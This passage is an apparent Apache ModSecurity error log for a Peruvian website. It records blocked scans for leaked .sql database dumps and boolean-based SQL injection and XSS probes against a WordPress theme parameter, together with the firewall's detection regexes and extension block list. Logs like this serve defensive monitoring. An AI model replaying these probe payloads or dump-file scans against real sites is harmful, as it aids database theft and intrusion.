.bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/accounts.sql"] [unique_id "ZoqxcPcO2IzqYGkif72obQAAAAg"] [Sun Jul 07 10:17:05.519237 2024] [:error] [pid 30828:tid 139722659718912] [client 45.79.66.123:33410] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_peru.sql"] [unique_id "ZoqxcTbJWLg2ecbngu9H6QAAAIE"] [Sun Jul 07 10:17:06.208416 2024] [:error] [pid 30827:tid 139722475079424] [client 45.79.66.123:33412] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_old.sql"] [unique_id "ZoqxckGuaLybMBNkB61tZQAAAFc"] [Sun Jul 07 10:17:06.860022 2024] [:error] [pid 31926:tid 139722642933504] [client 45.79.66.123:33414] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database_dump.sql"] [unique_id "Zoqxcnug2jzbr_AlO3dx0gAAAMM"] [Sun Jul 07 10:17:07.380449 2024] [:error] [pid 30826:tid 139722500257536] [client 185.129.61.3:33416] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-nvestigacionperu.sql"] [unique_id "Zoqxc_cO2IzqYGkif72obgAAABQ"] [Sun Jul 07 10:17:07.786481 2024] [:error] [pid 30826:tid 139722491864832] [client 185.129.61.3:33418] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-investigacionperu.sql"] [unique_id "Zoqxc_cO2IzqYGkif72obwAAABU"] [Sun Jul 07 10:17:08.221894 2024] [:error] [pid 30826:tid 139722668111616] [client 185.129.61.3:33420] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/igacionperu-2023.sql"] [unique_id "ZoqxdPcO2IzqYGkif72ocAAAAAA"] [Sun Jul 07 10:17:08.638873 2024] [:error] [pid 30827:tid 139722525435648] [client 185.129.61.3:33422] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-nperu.sql"] [unique_id "ZoqxdEGuaLybMBNkB61tZgAAAFE"] [Sun Jul 07 10:17:09.089520 2024] [:error] [pid 31926:tid 139722659718912] [client 185.129.61.3:33424] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/users.sql"] [unique_id "ZoqxdXug2jzbr_AlO3dx0wAAAME"] [Sun Jul 07 10:17:09.522297 2024] [:error] [pid 31926:tid 139722617755392] [client 185.129.61.3:33426] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/customers.sql"] [unique_id "ZoqxdXug2jzbr_AlO3dx1AAAAMY"] [Sun Jul 07 10:17:10.005147 2024] [:error] [pid 30826:tid 139722508650240] [client 185.129.61.3:33428] [client 185.129.61.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022.sql"] [unique_id "ZoqxdvcO2IzqYGkif72ocQAAABM"] [Sun Jul 07 10:17:10.428915 2024] [:error] [pid 30828:tid 139722567399168] [client 109.70.100.4:33430] [client 109.70.100.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/translate.sql"] [unique_id "ZoqxdjbJWLg2ecbngu9H6gAAAIw"] [Sun Jul 07 10:17:10.830170 2024] [:error] [pid 30828:tid 139722617755392] [client 109.70.100.4:33432] [client 109.70.100.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dbdump.sql"] [unique_id "ZoqxdjbJWLg2ecbngu9H6wAAAIY"] [Sun Jul 07 16:18:28.362548 2024] [:error] [pid 30828:tid 139722466686720] [client 141.98.81.37:37744] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22.\\x22).(\\x22,) found within ARGS:ver: 1.8.5.47\\x22.\\x22).(\\x22,)'"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGJDbJWLg2ecbngu9JWgAAAJg"] [Sun Jul 07 16:18:40.634657 2024] [:error] [pid 31926:tid 139722651326208] [client 141.98.81.37:37748] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5196= found within ARGS:ver: 1.8.5.47) AND 5196=8526 AND (7600=7600"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMHug2jzbr_AlO3dz3AAAAMI"] [Sun Jul 07 16:18:41.028566 2024] [:error] [pid 31926:tid 139722668111616] [client 141.98.81.37:37750] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47) AND 5469=5469 AND (4510=4510"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMXug2jzbr_AlO3dz3QAAAMA"] [Sun Jul 07 16:18:41.517520 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:37752] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8163= found within ARGS:ver: 1.8.5.47 AND 8163=4162"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMXug2jzbr_AlO3dz3gAAAMw"] [Sun Jul 07 16:18:41.816815 2024] [:error] [pid 31926:tid 139722600969984] [client 141.98.81.37:37754] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47 AND 5469=5469"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMXug2jzbr_AlO3dz3wAAAMg"] [Sun Jul 07 16:18:42.275645 2024] [:error] [pid 30828:tid 139722559006464] [client 141.98.81.37:37756] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2925= found within ARGS:ver: 1.8.5.47') AND 2925=6160 AND ('pfPq'='pfPq"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMjbJWLg2ecbngu9JWwAAAI0"] [Sun Jul 07 16:18:42.579822 2024] [:error] [pid 30826:tid 139722475079424] [client 141.98.81.37:37758] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47') AND 5469=5469 AND ('vWnN'='vWnN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMvcO2IzqYGkif72pLgAAABc"] [Sun Jul 07 16:18:43.170977 2024] [:error] [pid 30828:tid 139722491864832] [client 141.98.81.37:37760] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4591= found within ARGS:ver: 1.8.5.47' AND 4591=9106 AND 'rWrj'='rWrj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMzbJWLg2ecbngu9JXAAAAJU"] [Sun Jul 07 16:18:43.577946 2024] [:error] [pid 30828:tid 139722567399168] [client 141.98.81.37:37762] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 5469= found within ARGS:ver: 1.8.5.47' AND 5469=5469 AND 'hYZT'='hYZT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGMzbJWLg2ecbngu9JXQAAAIw"] [Sun Jul 07 16:18:44.020907 2024] [:error] [pid 31926:tid 139722491864832] [client 141.98.81.37:37766] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file 